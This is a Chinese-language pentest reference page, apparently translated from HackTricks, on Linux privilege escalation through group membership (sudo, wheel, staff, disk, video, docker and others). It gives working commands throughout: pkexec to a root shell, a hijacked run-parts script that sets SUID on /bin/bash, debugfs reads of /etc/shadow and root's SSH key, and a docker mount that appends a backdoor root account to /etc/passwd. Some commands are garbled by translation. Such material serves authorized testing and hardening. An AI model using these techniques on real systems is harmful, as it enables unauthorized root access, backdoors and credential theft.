Sudo/管理员组
PE - 方法 1
有时 ,**默认情况下(或因为某些软件需要它)**在 /etc/sudoers 文件中可以找到一些这样的行:
Copy # Allow members of group sudo to execute any command
%sudo ALL= ( ALL:ALL ) ALL
# Allow members of group admin to execute any command
%admin ALL= ( ALL:ALL ) ALL 这意味着任何属于sudo或admin组的用户都可以以sudo身份执行任何操作 。
如果是这种情况,要成为root,你只需执行 :
PE - 方法 2
查找所有 suid 二进制文件,并检查是否存在二进制文件 Pkexec :
Copy find / -perm -4000 2> /dev/null 如果你发现二进制文件 pkexec 是一个 SUID 二进制文件 ,并且你属于 sudo 或 admin ,你可能可以使用 pkexec 以 sudo 身份执行二进制文件。
这是因为通常这些是 polkit 策略 内的组。该策略基本上识别哪些组可以使用 pkexec。使用以下命令检查:
Copy cat /etc/polkit-1/localauthority.conf.d/* 在那里你会发现哪些组被允许执行 pkexec ,并且在某些 Linux 发行版中,sudo 和 admin 组默认出现。
要 成为 root,你可以执行 :
Copy pkexec "/bin/sh" #You will be prompted for your user password 如果你尝试执行 pkexec 并且收到这个 错误 :
Copy polkit-agent-helper-1: error response to PolicyKit daemon: GDBus.Error:org.freedesktop.PolicyKit1.Error.Failed: No session for cookie
==== AUTHENTICATION FAILED ===
Error executing command as another user: Not authorized 这不是因为你没有权限,而是因为你没有通过GUI连接 。对此问题有一个解决方法在这里: https://github.com/NixOS/nixpkgs/issues/18012#issuecomment-335350903 。你需要2个不同的ssh会话 :
Copy echo $$ #Step1: Get current PID
pkexec "/bin/bash" #Step 3, execute pkexec
#Step 5, if correctly authenticate, you will have a root session Copy pkttyagent --process < PID of session 1> #Step 2, attach pkttyagent to session1
#Step 4, you will be asked in this session to authenticate to pkexec Wheel Group
有时 ,默认情况下 在**/etc/sudoers**文件中可以找到这一行:
Copy %wheel ALL=(ALL:ALL) ALL 这意味着任何属于wheel组的用户都可以以sudo身份执行任何操作 。
如果是这种情况,要成为root,你只需执行 :
Shadow Group
来自 group shadow 的用户可以 read /etc/shadow 文件:
Copy -rw-r----- 1 root shadow 1824 Apr 26 19:10 /etc/shadow So, read the file and try to crack some hashes .
Staff Group
staff : 允许用户在不需要根权限的情况下对系统(/usr/local)进行本地修改(请注意,/usr/local/bin 中的可执行文件在任何用户的 PATH 变量中,并且它们可能会“覆盖” /bin 和 /usr/bin 中同名的可执行文件)。与更相关于监控/安全的 "adm" 组进行比较。 [source]
在 debian 发行版中,$PATH 变量显示 /usr/local/ 将以最高优先级运行,无论您是否是特权用户。
Copy $ echo $PATH
/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
# echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin 如果我们可以劫持 /usr/local 中的一些程序,我们就可以轻松获得 root 权限。
劫持 run-parts 程序是一种轻松获得 root 权限的方法,因为大多数程序会像 (crontab, 当 ssh 登录时) 一样运行 run-parts。
Copy $ cat /etc/crontab | grep run-parts
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.daily ; }
47 6 * * 7 root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.weekly ; }
52 6 1 * * root test -x /usr/sbin/anacron || { cd / && run-parts --report /etc/cron.monthly ; } 或当新的 ssh 会话登录时。
Copy $ pspy64
2024/02/01 22:02:08 CMD: UID= 0 PID= 1 | init [2]
2024/02/01 22:02:10 CMD: UID= 0 PID= 17883 | sshd: [accepted]
2024/02/01 22:02:10 CMD: UID= 0 PID= 17884 | sshd: [accepted]
2024/02/01 22:02:14 CMD: UID= 0 PID= 17886 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2024/02/01 22:02:14 CMD: UID= 0 PID= 17887 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2024/02/01 22:02:14 CMD: UID= 0 PID= 17888 | run-parts --lsbsysinit /etc/update-motd.d
2024/02/01 22:02:14 CMD: UID= 0 PID= 17889 | uname -rnsom
2024/02/01 22:02:14 CMD: UID= 0 PID= 17890 | sshd: mane [priv]
2024/02/01 22:02:15 CMD: UID= 0 PID= 17891 | -bash 利用
Copy # 0x1 Add a run-parts script in /usr/local/bin/
$ vi /usr/local/bin/run-parts
#! /bin/bash
chmod 4777 /bin/bash
# 0x2 Don't forget to add a execute permission
$ chmod +x /usr/local/bin/run-parts
# 0x3 start a new ssh sesstion to trigger the run-parts program
# 0x4 check premission for `u+s`
$ ls -la /bin/bash
-rwsrwxrwx 1 root root 1099016 May 15 2017 /bin/bash
# 0x5 root it
$ /bin/bash -p 磁盘组
此权限几乎等同于根访问 ,因为您可以访问机器内部的所有数据。
文件:/dev/sd[a-z][1-9]
Copy df -h #Find where "/" is mounted
debugfs /dev/sda1
debugfs: cd /root
debugfs: ls
debugfs: cat /root/.ssh/id_rsa
debugfs: cat /etc/shadow 注意,使用 debugfs 你也可以 写文件 。例如,要将 /tmp/asd1.txt 复制到 /tmp/asd2.txt,你可以这样做:
Copy debugfs -w /dev/sda1
debugfs: dump /tmp/asd1.txt /tmp/asd2.txt 然而,如果你尝试写入由 root 拥有的文件 (如 /etc/shadow 或 /etc/passwd),你将会遇到“权限被拒绝 ”错误。
视频组
使用命令 w 你可以找到谁已登录系统 ,它将显示如下输出:
Copy USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
yossi tty1 22:16 5:13m 0.05s 0.04s -bash
moshe pts/1 10.10.14.44 02:53 24:07 0.06s 0.06s /bin/bash tty1 表示用户 yossi 正在物理登录 到机器上的一个终端。
video group 有权限查看屏幕输出。基本上,你可以观察屏幕。在此之前,你需要 以原始数据抓取当前屏幕上的图像 并获取屏幕使用的分辨率。屏幕数据可以保存在 /dev/fb0,你可以在 /sys/class/graphics/fb0/virtual_size 找到该屏幕的分辨率。
Copy cat /dev/fb0 > /tmp/screen.raw
cat /sys/class/graphics/fb0/virtual_size 要打开 原始图像 ,您可以使用GIMP ,选择**screen.raw文件,并选择文件类型为 原始图像数据**:
然后将宽度和高度修改为屏幕上使用的值,并检查不同的图像类型(并选择显示屏幕效果更好的那个):
Root Group
看起来默认情况下root组的成员 可以访问修改 某些服务 配置文件或某些库 文件或其他有趣的东西 ,这些都可以用来提升权限...
检查root成员可以修改哪些文件 :
Copy find / -group root -perm -g=w 2> /dev/null Docker 组
您可以将主机的根文件系统挂载到实例的卷 ,因此当实例启动时,它会立即加载一个 chroot 到该卷中。这实际上使您在机器上获得了 root 权限。
Copy docker image #Get images from the docker service
#Get a shell inside a docker container with access as root to the filesystem
docker run -it --rm -v /:/mnt < imagenam e > chroot /mnt bash
#If you want full access from the host, create a backdoor in the passwd file
echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /etc/passwd
#Ifyou just want filesystem and network access you can startthe following container:
docker run --rm -it --pid=host --net=host --privileged -v /:/mnt < imagenam e > chroot /mnt bashbash 最后,如果你不喜欢之前的任何建议,或者由于某种原因它们不起作用(docker api 防火墙?),你可以尝试运行一个特权容器并从中逃逸 ,如这里所述:
Docker Security 如果你对 docker socket 有写权限,请阅读这篇关于如何通过滥用 docker socket 提升权限的文章 。
lxc/lxd 组
Interesting Groups - Linux Privesc Adm 组
通常,adm 成员 有权限读取 位于 /var/log/ 中的日志文件。
因此,如果你已经攻陷了这个组中的用户,你应该确实查看日志 。
Auth 组
在 OpenBSD 中,auth 组通常可以在 /etc/skey /var/db/yubikey 提升权限 到 root:https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot
